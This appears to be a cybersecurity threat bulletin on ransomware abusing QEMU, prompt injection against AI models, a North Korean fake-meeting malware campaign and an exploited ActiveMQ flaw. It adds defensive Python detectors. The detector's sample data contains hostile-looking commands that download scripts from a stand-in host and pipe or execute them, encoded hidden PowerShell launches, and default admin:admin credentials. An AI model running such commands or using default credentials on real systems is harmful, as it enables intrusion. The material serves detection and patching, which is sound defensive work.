24 April 2026

Ankura CTIX FLASH Update – April 21, 2026

Ankura Consulting Group LLC

Ankura Consulting Group, LLC is an independent global expert services and advisory firm that delivers services and end-to-end solutions to help clients at critical inflection points related to conflict, crisis, performance, risk, strategy, and transformation. Ankura has more than 2,000 professionals serving 3,000+ clients across 55 countries. Collaborative lateral thinking, hard-earned experience, and multidisciplinary capabilities drive results, and Ankura is unrivalled in its ability to assist clients to Protect, Create, and Recover Value™. For more information, please visit ankura.com.

Malware Activity

From Ransomware to AI: Why Trust Is the New Target

Recent reporting highlights a shared theme across both ransomware operations and attacks on artificial intelligence: attackers are increasingly exploiting trusted systems rather than breaking them. The Payouts King ransomware group demonstrates this by abusing QEMU, a legitimate virtualization tool, to quietly run hidden Linux virtual machines that security software cannot see, giving attackers long‑term, stealthy access to compromised systems. In parallel, AI systems face a similar challenge through prompt injection attacks, where malicious instructions are hidden inside seemingly legitimate content to trick models into revealing information or bypassing safeguards. In both cases, the technology behaves as designed. Virtual machines isolate environments, and AI models follow instructions in good faith. This makes the problem especially difficult to eliminate with technical controls alone. Together, these stories underscore a growing reality in cybersecurity: threats are increasingly rooted in abuse of trust and normal behavior, not obvious malware. As a result, defenders must focus on visibility, monitoring, user awareness, and containment, rather than assuming any tool (human or machine) can be made completely immune to deception.

Threat Actor Activity

North Korean Hackers Use Fake Video Meetings to Target Crypto and Web3 Professionals

North Korea-linked threat actor UNC1069 is running a highly targeted campaign against cryptocurrency and Web3 professionals by abusing fake Zoom, Google Meet, and Microsoft Teams meetings across Windows, macOS, and Linux. UNC1069, which overlaps with Bluenoroff/CryptoCore, impersonates venture capital and investment firms, often hijacking real accounts and continuing existing conversations before scheduling “due diligence” calls via services like Calendly. Victims are lured to convincing fake meeting portals that may display AI-generated or replayed video of executives. During the call, attackers cite audio/video issues or missing components and guide victims through a “ClickFix”-style process, instructing them to open a terminal or elevated PowerShell window and paste attacker-supplied commands. On Windows, these commands chain PowerShell and obfuscated VBScript payloads, disable protections, and install Cabbage RAT variants. On macOS, terminal commands fetch fake Zoom/system binaries that bypass Gatekeeper and deploy NukeSped RAT; Linux victims are given curl-based scripts that pull ELF downloaders and a second-stage RAT aligned with Cabbage. The fake meeting portals also act as surveillance tools, using browser APIs and WebRTC to capture audio and video for reuse or deepfakes. UNC1069 maintains a large infrastructure of lookalike meeting and fake VC domains and has also been tied to supply-chain attacks like the Axios npm compromise. CTIX Analysts recommend protective measures such as strict bans on pasting commands during calls, out-of-band verification of counterparties, monitoring for suspicious scripting activity, and enforcing least-privilege access to wallet infrastructure.
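The report recommends monitoring for suspicious scripting activity following these paste-the-command sessions. The following is an added example, not code from the report or from any vendor, that runs a few platform-specific heuristics over constructed process-start telemetry: the event format ("os|parent|command_line"), the sample lines and the hostnames are all assumptions made for the illustration.

```python
import re

# Constructed sample process-start telemetry (not from the report), one event
# per line as "os|parent_process|command_line". The lines imitate the three
# platform chains described above; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    "windows|powershell.exe|powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4A",
    "windows|powershell.exe|wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\fix.vbs",
    "macos|Terminal|curl -fsSL https://meet.invalid/zoom_fix -o /tmp/zoom_fix; chmod +x /tmp/zoom_fix; /tmp/zoom_fix",
    "linux|bash|curl -s https://meet.invalid/setup.sh | sh",
    "linux|bash|ls -la /home/user",
    "windows|explorer.exe|C:\\Program Files\\Zoom\\bin\\Zoom.exe",
]

# (rule name, platforms, parent-process pattern or None, command-line pattern)
RULES = [
    # Windows: PowerShell started hidden or handed an encoded command block.
    ("powershell-hidden-or-encoded", {"windows"}, None,
     r"powershell.*\s-(?:e(?:nc(?:odedcommand)?)?|w(?:indowstyle)?\s+hidden)\b"),
    # Windows: a VBScript host launched directly by PowerShell.
    ("powershell-spawns-vbscript-host", {"windows"}, r"^powershell\.exe$",
     r"^[wc]script(?:\.exe)?\b"),
    # macOS/Linux: a download piped straight into a shell.
    ("download-piped-to-shell", {"macos", "linux"}, None,
     r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b"),
    # macOS/Linux: curl saves a file that is then made executable and run.
    ("download-then-execute", {"macos", "linux"}, None,
     r"\bcurl\b.*\s-o\s+([^\s;&|]+).*chmod\s+\+x\s+\1\b"),
]

def parse_event(line):
    os_name, parent, cmd = line.split("|", 2)
    return os_name.strip().lower(), parent.strip(), cmd.strip()

def scan_events(lines=SAMPLE_EVENTS):
    """Return [(rule_name, command_line)] for every event that matches a rule."""
    hits = []
    for line in lines:
        os_name, parent, cmd = parse_event(line)
        for name, platforms, parent_re, cmd_re in RULES:
            if os_name not in platforms:
                continue
            if parent_re and not re.search(parent_re, parent, re.I):
                continue
            if re.search(cmd_re, cmd, re.I):
                hits.append((name, cmd))
    return hits

if __name__ == "__main__":
    for name, cmd in scan_events():
        print(f"[{name}] {cmd}")
```

In production these patterns belong in an EDR or SIEM rule keyed on the parent being an interactive terminal or console, which is what distinguishes a user pasting instructions from a call from ordinary scripted administration.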

Vulnerabilities

CISA Warns of Actively Exploited 13-Year-Old Apache ActiveMQ RCE Flaw

Apache ActiveMQ is facing renewed scrutiny after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-34197 to its Known Exploited Vulnerabilities (KEV) catalog, giving federal agencies until no later than April 30, 2026, to patch under Binding Operational Directive 22-01. The flaw, which had reportedly existed unnoticed for thirteen (13) years, allows attackers to achieve remote code execution (RCE) through ActiveMQ’s exposed Jolokia management API by forcing the broker to load a malicious remote Spring XML configuration file. Although the vulnerability technically requires authentication, many environments still use default credentials such as “admin:admin,” making exploitation relatively easy. In certain ActiveMQ versions between 6.0.0 and 6.1.1, the flaw can even become fully unauthenticated when chained with CVE-2024-32114, which exposes the Jolokia API without login requirements. Security researchers noted that more than 8,000 internet-facing ActiveMQ instances remain exposed, increasing the likelihood of continued exploitation. Organizations are being urged to immediately upgrade to patched versions 5.19.5 or 6.2.3, restrict access to the Jolokia API and web console, eliminate default credentials, and closely monitor logs for suspicious broker configuration activity. CTIX analysts strongly urge any affected entities to apply the patches and follow the mitigation guidance to prevent exploitation.
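Two of the checks above (which release line a broker is on, and whether it still carries default credentials) are simple to script. The following is an added example, not code from the advisory or from the ActiveMQ project: it assumes that any release older than the patched version on the same major line is affected (the advisory gives no lower bound), treats the 6.0.0 to 6.1.1 range as where the CVE-2024-32114 chain may apply, and reads constructed sample copies of ActiveMQ's conf/users.properties and conf/jetty-realm.properties.

```python
# Constructed sample config files (not from any real broker). The formats are
# ActiveMQ's conf/users.properties ("user=password") and
# conf/jetty-realm.properties ("user: password, role"), both of which ship
# with an admin/admin entry by default.
USERS_PROPERTIES = """\
admin=admin
svc_orders=S0me-Str0ng-Pass!
"""
JETTY_REALM = """\
admin: admin, admin
user: user, user
"""

# Fixed releases named in the advisory; anything older on the same major line
# is treated as affected (assumption: the advisory gives no lower bound).
PATCHED = {5: (5, 19, 5), 6: (6, 2, 3)}
# Range the advisory ties to the CVE-2024-32114 chain (unauthenticated Jolokia).
CHAIN_RANGE = ((6, 0, 0), (6, 1, 1))

def parse_version(text):
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in parts)

def assess_version(text):
    """Classify a broker version against the advisory's fix levels."""
    v = parse_version(text)
    fixed = PATCHED.get(v[0])
    if fixed is None:
        return "unknown major line; check the vendor advisory"
    if v >= fixed:
        return "patched"
    if CHAIN_RANGE[0] <= v <= CHAIN_RANGE[1]:
        return "vulnerable; unauthenticated chain with CVE-2024-32114 possible"
    return "vulnerable (authenticated Jolokia access required)"

def weak_credentials(users_text, realm_text):
    """Return [(file, user)] for every account whose password equals its name."""
    findings = []
    for line in users_text.splitlines():
        user, sep, password = line.partition("=")
        if sep and not line.lstrip().startswith("#") and user.strip() == password.strip():
            findings.append(("users.properties", user.strip()))
    for line in realm_text.splitlines():
        user, sep, rest = line.partition(":")
        if sep and user.strip() == rest.split(",")[0].strip():
            findings.append(("jetty-realm.properties", user.strip()))
    return findings
```

Run `assess_version` against the version string your broker reports and `weak_credentials` against the two files from its conf directory; a "patched" result still leaves the Jolokia API and web console exposure to address separately.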

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.
